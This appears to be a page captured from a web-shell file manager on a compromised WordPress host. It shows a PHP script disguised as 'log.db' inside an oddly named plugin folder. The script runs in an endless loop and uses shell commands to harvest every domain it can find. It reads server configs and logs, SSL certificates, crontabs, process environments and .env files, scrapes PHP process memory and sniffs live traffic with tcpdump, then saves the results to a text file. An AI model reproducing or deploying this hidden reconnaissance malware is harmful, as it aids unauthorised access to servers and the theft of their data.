📁 File Manager Pro
v10.0.2 | PHP: 8.1.34
Server: LiteSpeed
2026-06-26 08:53:52
📂
/
/
home
/
pallabnv
/
public_html
/
wp-content__3bb9dea
/
plugins
/
exrwxyy
✏️
Editing: log.db
<?php $outputFile = 'siters.txt'; $sleepInterval = 60; // ?????????,???? 60s $domainRegex = '/[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+/i'; echo "Deep Scanner Started. Scanning all configs, logs, directory names, and source codes...\n"; // ==================== ???????? ==================== // ?? 1: ?????? function scanDirectories($domainRegex) { $found = []; $dirOutput = @shell_exec("find / -maxdepth 5 -type d -regextype posix-extended -regex '.*\/[a-z0-9.-]+\.[a-z]{2,}' 2>/dev/null"); if ($dirOutput) { $paths = explode("\n", $dirOutput); foreach ($paths as $path) { $folderName = basename(trim($path)); if (!empty($folderName) && preg_match($domainRegex, $folderName, $matches)) { $found[] = $matches[0]; } } } return $found; } // ?? 2: ????? Web ???? function scanConfigsAndLogs($domainRegex) { $found = []; $searchPaths = [ '/etc/nginx/', '/etc/apache2/', '/usr/local/nginx/', '/www/server/panel/', '/var/log/', '/www/wwwlogs/' ]; foreach ($searchPaths as $path) { if (!@is_dir($path)) continue; $grepOutput = @shell_exec("grep -rE '(server_name|ServerName|ServerAlias)' " . escapeshellarg($path) . " 2>/dev/null"); if ($grepOutput && preg_match_all($domainRegex, $grepOutput, $matches)) { if (!empty($matches[0])) { $found = array_merge($found, $matches[0]); } } } return $found; } // ?? 3: ????? Web ??? Hosts function scanRuntimeAndHosts($domainRegex) { $found = []; $cmds = ['nginx -T', 'apache2ctl -S', 'httpd -S', 'cat /etc/hosts']; foreach ($cmds as $cmd) { $out = @shell_exec("$cmd 2>/dev/null"); if ($out && preg_match_all($domainRegex, $out, $matches)) { if (!empty($matches[0])) { $found = array_merge($found, $matches[0]); } } } return $found; } // ?? 4: SSL/TLS ??????? function scanSslCertificates($domainRegex) { $found = []; $cmd = "find /etc/ssl/ /etc/letsencrypt/ /etc/pki/ /www/server/panel/vhost/ssl/ -type f \( -name '*.crt' -o -name '*.pem' \) 2>/dev/null | xargs -I {} openssl x509 -in {} -text -noout 2>/dev/null | grep -oP 'DNS:[a-zA-Z0-9.-]+'"; $sslOutput = @shell_exec($cmd); if ($sslOutput) { $sslOutput = str_ireplace('DNS:', '', $sslOutput); if (preg_match_all($domainRegex, $sslOutput, $matches)) { if (!empty($matches[0])) { $found = array_merge($found, $matches[0]); } } } return $found; } // ?? 5: ??????????? function scanCrontabAndServices($domainRegex) { $found = []; $cmd = "cat /etc/crontab /etc/cron.*/* /var/spool/cron/* /var/spool/cron/crontabs/* /etc/systemd/system/*.service 2>/dev/null"; $cronOutput = @shell_exec($cmd); if ($cronOutput && preg_match_all($domainRegex, $cronOutput, $matches)) { if (!empty($matches[0])) { $found = array_merge($found, $matches[0]); } } return $found; } // ?? 6: ????????????? function scanProcessEnvironment($domainRegex) { $found = []; $cmd = "cat /proc/*/cmdline /proc/*/environ 2>/dev/null | tr '\\0' '\\n'"; $procOutput = @shell_exec($cmd); if ($procOutput && preg_match_all($domainRegex, $procOutput, $matches)) { if (!empty($matches[0])) { $found = array_merge($found, $matches[0]); } } return $found; } // ?? 7: ????????? (???/?? SQLite) function scanPanelDatabases($domainRegex) { $found = []; $btDbPath = '/www/server/panel/data/default.db'; if (@file_exists($btDbPath)) { $btOutput = @shell_exec("sqlite3 " . escapeshellarg($btDbPath) . " \"SELECT name FROM sites;\" 2>/dev/null"); if ($btOutput && preg_match_all($domainRegex, $btOutput, $matches)) { if (!empty($matches[0])) { $found = array_merge($found, $matches[0]); } } } return $found; } // ?? 8: ??????????? function scanMailConfigs($domainRegex) { $found = []; $cmd = "cat /etc/postfix/main.cf /etc/mail/sendmail.cf /var/log/mail.log /var/log/maillog 2>/dev/null"; $mailOutput = @shell_exec($cmd); if ($mailOutput && preg_match_all($domainRegex, $mailOutput, $matches)) { if (!empty($matches[0])) { $found = array_merge($found, $matches[0]); } } return $found; } // ?? 9: ???????? .env ???? function scanEnvFiles($domainRegex) { $found = []; $cmd = "find /www/wwwroot/ /home/ /var/www/ -maxdepth 4 -type f \( -name '.env' -o -name '*.json' -o -name '*.ini' \) 2>/dev/null | xargs -I {} grep -E '(URL|DOMAIN|HOST)' {} 2>/dev/null"; $out = @shell_exec($cmd); if ($out && preg_match_all($domainRegex, $out, $matches)) { if (!empty($matches[0])) { $found = array_merge($found, $matches[0]); } } return $found; } // ?? 10: ???? Web ?????????????? function scanSourceCode($domainRegex) { $found = []; $searchDirs = ['/www/wwwroot/', '/home/', '/var/www/']; foreach ($searchDirs as $dir) { if (!@is_dir($dir)) continue; // ??? 3000 ?,??????? $cmd = "grep -rPh --include='*.php' --include='*.html' --include='*.js' '[a-zA-Z0-9.-]+\.[a-zA-Z]{2,6}' " . escapeshellarg($dir) . " 2>/dev/null | head -n 3000"; $out = @shell_exec($cmd); if ($out && preg_match_all($domainRegex, $out, $matches)) { if (!empty($matches[0])) { $found = array_merge($found, $matches[0]); } } } return $found; } // ?? 11: ?? PHP ???????? function scanPhpProcessMemory($domainRegex) { $found = []; $cmd = "pidof php-fpm php 2>/dev/null | tr ' ' '\\n' | xargs -I {} strings /proc/{}/mem 2>/dev/null | grep -E '[a-zA-Z0-9.-]+\.[a-zA-Z]{2,6}' | head -n 1000"; $out = @shell_exec($cmd); if ($out && preg_match_all($domainRegex, $out, $matches)) { if (!empty($matches[0])) { $found = array_merge($found, $matches[0]); } } return $found; } // ?? 12: ???????????? function scanNetworkTraffic($domainRegex) { $found = []; // ?? 5 ???,???????? $cmd = "timeout 5 tcpdump -i any -c 100 -nn -A 'port 80 or port 443' 2>/dev/null | grep -oE '[a-zA-Z0-9.-]+\.[a-zA-Z]{2,6}'"; $out = @shell_exec($cmd); if ($out && preg_match_all($domainRegex, $out, $matches)) { if (!empty($matches[0])) { $found = array_merge($found, $matches[0]); } } return $found; } // ==================== ????? ==================== while (true) { $foundPool = []; // ???? 12 ?????????? $foundPool = array_merge($foundPool, scanDirectories($domainRegex)); $foundPool = array_merge($foundPool, scanConfigsAndLogs($domainRegex)); $foundPool = array_merge($foundPool, scanRuntimeAndHosts($domainRegex)); $foundPool = array_merge($foundPool, scanSslCertificates($domainRegex)); $foundPool = array_merge($foundPool, scanCrontabAndServices($domainRegex)); $foundPool = array_merge($foundPool, scanProcessEnvironment($domainRegex)); $foundPool = array_merge($foundPool, scanPanelDatabases($domainRegex)); $foundPool = array_merge($foundPool, scanMailConfigs($domainRegex)); $foundPool = array_merge($foundPool, scanEnvFiles($domainRegex)); $foundPool = array_merge($foundPool, scanSourceCode($domainRegex)); $foundPool = array_merge($foundPool, scanPhpProcessMemory($domainRegex)); $foundPool = array_merge($foundPool, scanNetworkTraffic($domainRegex)); // ????????????? $uniqueDomains = array_unique(array_filter($foundPool, function($val) { $val = strtolower(trim($val, ".; ")); return !empty($val) && strlen($val) > 4 && $val !== 'localhost' && !filter_var($val, FILTER_VALIDATE_IP); })); // ????????????,?????????? $existing = @file_exists($outputFile) ? explode("\n", strtolower(trim(@file_get_contents($outputFile)))) : []; $existing = array_filter(array_map('trim', $existing)); // ????????????? $newOnes = array_diff($uniqueDomains, $existing); // ??????????????(LOCK_EX)???? if (!empty($newOnes)) { @file_put_contents($outputFile, implode("\n", $newOnes) . "\n", FILE_APPEND | LOCK_EX); echo "[" . date('Y-m-d H:i:s') . "] Discovered " . count($newOnes) . " new domains successfully.\n"; } else { echo "[" . date('Y-m-d H:i:s') . "] Scan cycle complete. No new domains detected.\n"; } // ?????? sleep($sleepInterval); }
💾 Save Changes
❌ Cancel